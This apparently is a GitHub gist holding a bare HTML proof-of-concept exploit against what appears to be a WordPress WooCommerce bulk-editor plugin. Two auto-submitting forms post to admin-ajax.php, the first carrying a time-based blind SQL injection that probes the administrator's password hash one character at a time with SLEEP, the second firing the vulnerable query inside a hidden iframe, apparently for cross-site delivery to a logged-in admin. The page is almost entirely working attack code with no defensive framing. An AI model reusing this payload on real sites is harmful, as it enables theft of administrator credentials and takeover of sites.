Skip to content

Instantly share code, notes, and snippets.

@lsemenenko
Last active March 21, 2026 07:17
Show Gist options
  • Select an option

  • Save lsemenenko/1f64f5ade8e64f63db5ea9fa575a7ad0 to your computer and use it in GitHub Desktop.

Select an option

Save lsemenenko/1f64f5ade8e64f63db5ea9fa575a7ad0 to your computer and use it in GitHub Desktop.
<!doctype html>
<html>
<body>
<form id="step1" action="https://a.local/wp-admin/admin-ajax.php" method="POST">
<input name="action" value="woobe_filter_products">
<input name="filter_current_key" value="theory4_true">
<input name="filter_data" value="woobe_filter[post_date_from]=2100-01-01%27 OR IF(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1 LIMIT 1),2,1)=%27w%27,SLEEP(3),0)%23">
</form>
<form id="step2" action="https://a.local/wp-admin/admin-ajax.php" method="POST" target="sink">
<input name="action" value="woobe_get_products">
<input name="draw" value="1">
<input name="lang" value="en">
<input name="length" value="10">
<input name="start" value="0">
<input name="order[0][column]" value="0">
<input name="order[0][dir]" value="asc">
<input name="search[value]" value="">
<input name="filter_current_key" value="theory4_true">
</form>
<iframe name="sink" style="display:none"></iframe>
<script>
document.getElementById('step1').submit();
setTimeout(function () { document.getElementById('step2').submit(); }, 1500);
</script>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment